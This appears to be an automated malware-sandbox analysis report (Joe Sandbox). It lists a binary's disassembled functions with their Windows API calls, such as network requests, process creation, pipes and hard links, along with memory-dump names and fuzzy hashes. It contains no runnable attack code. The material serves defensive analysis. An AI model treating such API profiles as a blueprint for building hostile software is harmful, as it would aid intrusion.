                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: b887ed780106e08c3834b6f20acd8d484e15d373ce2e708d19649b50e61f58c7
                                                                            • Instruction ID: a5da8b09cbb8c381fbdb597e474ae51ad5482f9104b8c731f2ae61752ffa8479
                                                                            • Opcode Fuzzy Hash: b887ed780106e08c3834b6f20acd8d484e15d373ce2e708d19649b50e61f58c7
                                                                            • Instruction Fuzzy Hash: 9341D235605741AFDB22DF24D880B2AB7E8AF89724F044A5EF8559F2D2D730F800CB62
                                                                            Function 0034E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0034E742
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0034E768
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0034E78D
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0034E7B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID: p1v`Kv
                                                                            • API String ID: 3321077145-2864719405
                                                                            • Opcode ID: 038c97af13621eda8d2a817865a8798b6b5cfe2f59a4cf8829fea829b4e5ea0d
                                                                            • Instruction ID: 6007a25db8d81f85887f1624bb8a7a93f2e27952db3c2d77e295f0414b8b0f4d
                                                                            • Opcode Fuzzy Hash: 038c97af13621eda8d2a817865a8798b6b5cfe2f59a4cf8829fea829b4e5ea0d
                                                                            • Instruction Fuzzy Hash: 80411339600610DFCB12EF55C454A4DBBE6BF99720F098499E986AF3A2CB74FD40CB91
                                                                            Function 00360567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,?,?), ref: 00360587
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 2358735015-567219261
                                                                            • Opcode ID: b92a19156fed1637c880fde7257204314ef62fab57482eb20a6dfd7608e6f0db
                                                                            • Instruction ID: 9b11d7c52a38d70a3ae126aea4f0eb054aebe9d09efe2d8a891b466e996aa83f
                                                                            • Opcode Fuzzy Hash: b92a19156fed1637c880fde7257204314ef62fab57482eb20a6dfd7608e6f0db
                                                                            • Instruction Fuzzy Hash: CB31C17050021AAFCF0AEF64CC529EFB3B4FF54314B008629E826AB6D5DB71E955CB80
                                                                            Function 0033B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0033B88E
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0033B8A1
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 0033B8D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3850602802-1403004172
                                                                            • Opcode ID: 6137d0654229acb454beb5975942ef0e882319630f647754eabdccb15850255f
                                                                            • Instruction ID: c96e08119ad133a521d49f8a8b786997118098daea15d85638ec9e971c7e513a
                                                                            • Opcode Fuzzy Hash: 6137d0654229acb454beb5975942ef0e882319630f647754eabdccb15850255f
                                                                            • Instruction Fuzzy Hash: 6A21E5B1A00208BFDB06AB64D896DFFB77CDF05354F104229F521AB1E1DB744D069760
                                                                            Function 003543E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00354401
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00354427
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00354457
                                                                            • InternetCloseHandle.WININET(00000000), ref: 0035449E
                                                                              • Part of subcall function 00355052: GetLastError.KERNEL32(?,?,003543CC,00000000,00000000,00000001), ref: 00355067
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 1951874230-3916222277
                                                                            • Opcode ID: 42e162c4940211fb774bab25605ad650b2aaf0b4a190ea46dd5fa6549f90adcc
                                                                            • Instruction ID: bfa89ea864911f682f150461b63e225a3870a80ac3f419e2e747b2ff1c8dc0cc
                                                                            • Opcode Fuzzy Hash: 42e162c4940211fb774bab25605ad650b2aaf0b4a190ea46dd5fa6549f90adcc
                                                                            • Instruction Fuzzy Hash: 2E21FFB2140208BFE7179F55CC81FBFB7FCEB48759F10801AF909961A0EA648D499770
                                                                            Function 003690E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031D1BA
                                                                              • Part of subcall function 0031D17C: GetStockObject.GDI32(00000011), ref: 0031D1CE
                                                                              • Part of subcall function 0031D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031D1D8
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0036915C
                                                                            • LoadLibraryW.KERNEL32(?), ref: 00369163
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00369178
                                                                            • DestroyWindow.USER32(?), ref: 00369180
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            • Opcode ID: 4e37fd825ac7e569557312daee60461753d365d7b22853d556639ffa7b377de7
                                                                            • Instruction ID: 8fa4402ae921abf1b8e00bdcac77488e0f90f1be435a1ebf913bdaa20482eb4e
                                                                            • Opcode Fuzzy Hash: 4e37fd825ac7e569557312daee60461753d365d7b22853d556639ffa7b377de7
                                                                            • Instruction Fuzzy Hash: AF21CF7120020ABBEF124F64DC84FBA37ADEF9A364F21825AF950961D4C775DC41A760
                                                                            Function 00349568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00349588
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003495B9
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 003495CB
                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00349605
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: c59bb3a6cff5022cd7194d8ae1c24af13b76e511c79be4d7d85fec86afab9cdf
                                                                            • Instruction ID: 165fc0fe105f3eeadbc4606daf71588a8e0f2b2adc21bc98a0bb8a0212b337c8
                                                                            • Opcode Fuzzy Hash: c59bb3a6cff5022cd7194d8ae1c24af13b76e511c79be4d7d85fec86afab9cdf
                                                                            • Instruction Fuzzy Hash: B0215E70600305ABEB229F25DC45B9B7BF8AF46724F204A5AF9A1DB2D0D770E944CF10
                                                                            Function 00349634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00349653
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00349683
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00349694
                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003496CE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 50fd18be3e4be373c0dae5dfc912f7530721d8c99a5ee3d6c8ae513cadf8439f
                                                                            • Instruction ID: 18a8b1b4e93771488234a3350445e66ef808a7e4495b5494b9a7f0e017f2f77f
                                                                            • Opcode Fuzzy Hash: 50fd18be3e4be373c0dae5dfc912f7530721d8c99a5ee3d6c8ae513cadf8439f
                                                                            • Instruction Fuzzy Hash: 7F2171716003059BDB229F699C45F9B77ECAF95734F210A1AF8A1EB2E0D774AC41CB50
                                                                            Function 0034DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0034DB0A
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0034DB5E
                                                                            • __swprintf.LIBCMT ref: 0034DB77
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0039DC00), ref: 0034DBB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            • Opcode ID: 2f9f4d045bd5f610fae15800a1ceec8168d92572bf8b9b6d5b42fa8d2670193e
                                                                            • Instruction ID: 7d4c248252e5444b1b4c9038e68df56b80576f12d6f884af5965538e65d87a71
                                                                            • Opcode Fuzzy Hash: 2f9f4d045bd5f610fae15800a1ceec8168d92572bf8b9b6d5b42fa8d2670193e
                                                                            • Instruction Fuzzy Hash: 61216535600208AFCB12EFA4DD95DEEBBF8EF89704B1040A9F505DB291DB71EA41CB61
                                                                            Function 0033C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0033C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0033C84A
                                                                              • Part of subcall function 0033C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0033C85D
                                                                              • Part of subcall function 0033C82D: GetCurrentThreadId.KERNEL32 ref: 0033C864
                                                                              • Part of subcall function 0033C82D: AttachThreadInput.USER32(00000000), ref: 0033C86B
                                                                            • GetFocus.USER32 ref: 0033CA05
                                                                              • Part of subcall function 0033C876: GetParent.USER32(?), ref: 0033C884
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0033CA4E
                                                                            • EnumChildWindows.USER32(?,0033CAC4), ref: 0033CA76
                                                                            • __swprintf.LIBCMT ref: 0033CA90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                            • String ID: %s%d
                                                                            • API String ID: 3187004680-1110647743
                                                                            • Opcode ID: 865c95c5fbc8eb9ebc97b6d521fb2b434568459bd5fc33d4723943fbc32ad7d0
                                                                            • Instruction ID: d40aa8d59ee3b179faaff6a73c642b86ff50c4ba20d529a3d7f7a8e7091e915b
                                                                            • Opcode Fuzzy Hash: 865c95c5fbc8eb9ebc97b6d521fb2b434568459bd5fc33d4723943fbc32ad7d0
                                                                            • Instruction Fuzzy Hash: 29113DB16102096ADF13BFA49CC6FEA376CAB44714F009066FA09BE186DB709A45DB70
                                                                            Function 00327A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __lock.LIBCMT ref: 00327AD8
                                                                              • Part of subcall function 00327CF4: __mtinitlocknum.LIBCMT ref: 00327D06
                                                                              • Part of subcall function 00327CF4: EnterCriticalSection.KERNEL32(00000000,?,00327ADD,0000000D), ref: 00327D1F
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 00327AE5
                                                                            • __lock.LIBCMT ref: 00327AF9
                                                                            • ___addlocaleref.LIBCMT ref: 00327B17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                            • String ID: `8
                                                                            • API String ID: 1687444384-1718026360
                                                                            • Opcode ID: 79bef1fd3eb8ffcac32ebe68ab5af7e38ec675aa857aaeeadad4100421bfd823
                                                                            • Instruction ID: 7d91dccaaeffd34341398e608b4bd471097632a6883a9076e74cecbacb59b49f
                                                                            • Opcode Fuzzy Hash: 79bef1fd3eb8ffcac32ebe68ab5af7e38ec675aa857aaeeadad4100421bfd823
                                                                            • Instruction Fuzzy Hash: AC018075504B10DFD722EF75E90674AB7F0FF40325F20894EE49A9B6A0CBB0A644CB41
                                                                            Function 0036E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0036E33D
                                                                            • _memset.LIBCMT ref: 0036E34C
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003C3D00,003C3D44), ref: 0036E37B
                                                                            • CloseHandle.KERNEL32 ref: 0036E38D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                            • String ID: D=<
                                                                            • API String ID: 3277943733-3444951095
                                                                            • Opcode ID: 427926ce329c806472024fec45aa38ae41d71cd671075171f96a0d17ad847f1b
                                                                            • Instruction ID: e7a5603b1815b3df4dd13d04811c014ad59210c4204803e42883563de1d7afc0
                                                                            • Opcode Fuzzy Hash: 427926ce329c806472024fec45aa38ae41d71cd671075171f96a0d17ad847f1b
                                                                            • Instruction Fuzzy Hash: 04F05EF5540314BAE2122B60AC49FB77E6CDB04754F008421BE0ADA1A2D375AE0087A8
                                                                            Function 00361945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003619F3
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00361A26
                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00361B49
                                                                            • CloseHandle.KERNEL32(?), ref: 00361BBF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                            • String ID:
                                                                            • API String ID: 2364364464-0
                                                                            • Opcode ID: 35ed793cde9354d5bf674b227f73ef04783daade55daf9efab0ca2e10ed171d7
                                                                            • Instruction ID: 1edbe5bfef3de656120dd216784d7ea5412ab213e612efb14976147223a0715b
                                                                            • Opcode Fuzzy Hash: 35ed793cde9354d5bf674b227f73ef04783daade55daf9efab0ca2e10ed171d7
                                                                            • Instruction Fuzzy Hash: 64816370600204ABDF16DF64C896BAEBBE5AF08720F18C459F905AF3D6D7B5A9418B90
                                                                            Function 0036E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0036E1D5
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0036E20D
                                                                            • IsDlgButtonChecked.USER32(?,00000001), ref: 0036E248
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0036E269
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0036E281
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ButtonCheckedLongWindow
                                                                            • String ID:
                                                                            • API String ID: 3188977179-0
                                                                            • Opcode ID: 1143a17575ffcecfe6676c6c907c51c9250e33e0f2d73262d10b07972dc08253
                                                                            • Instruction ID: 8e5e6664a5db318975a2009dd69fe621de5917c1420ee1d87f6ac03926d5b6e7
                                                                            • Opcode Fuzzy Hash: 1143a17575ffcecfe6676c6c907c51c9250e33e0f2d73262d10b07972dc08253
                                                                            • Instruction Fuzzy Hash: 3861A238600204AFDB22CF58C894FAAB7BAEF4A300F158059F9599B3A5C771AD59DB10
                                                                            Function 00341C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00341CB4
                                                                            • VariantClear.OLEAUT32(00000013), ref: 00341D26
                                                                            • VariantClear.OLEAUT32(00000000), ref: 00341D81
                                                                            • VariantClear.OLEAUT32(?), ref: 00341DF8
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00341E26
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                            • String ID:
                                                                            • API String ID: 4136290138-0
                                                                            • Opcode ID: de1991aa60039a096608f73995f8a9f59a74352db7e30895f51038ca6a522447
                                                                            • Instruction ID: 4e26481361aad3e993cb65f015b7cce2427dc0fcc25851688bcdd3887e6376ee
                                                                            • Opcode Fuzzy Hash: de1991aa60039a096608f73995f8a9f59a74352db7e30895f51038ca6a522447
                                                                            • Instruction Fuzzy Hash: DE5147B5A00209AFDB15CF58C880AAAB7F9FF4D314B158559ED59DB340E730EA51CFA0
                                                                            Function 00360688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
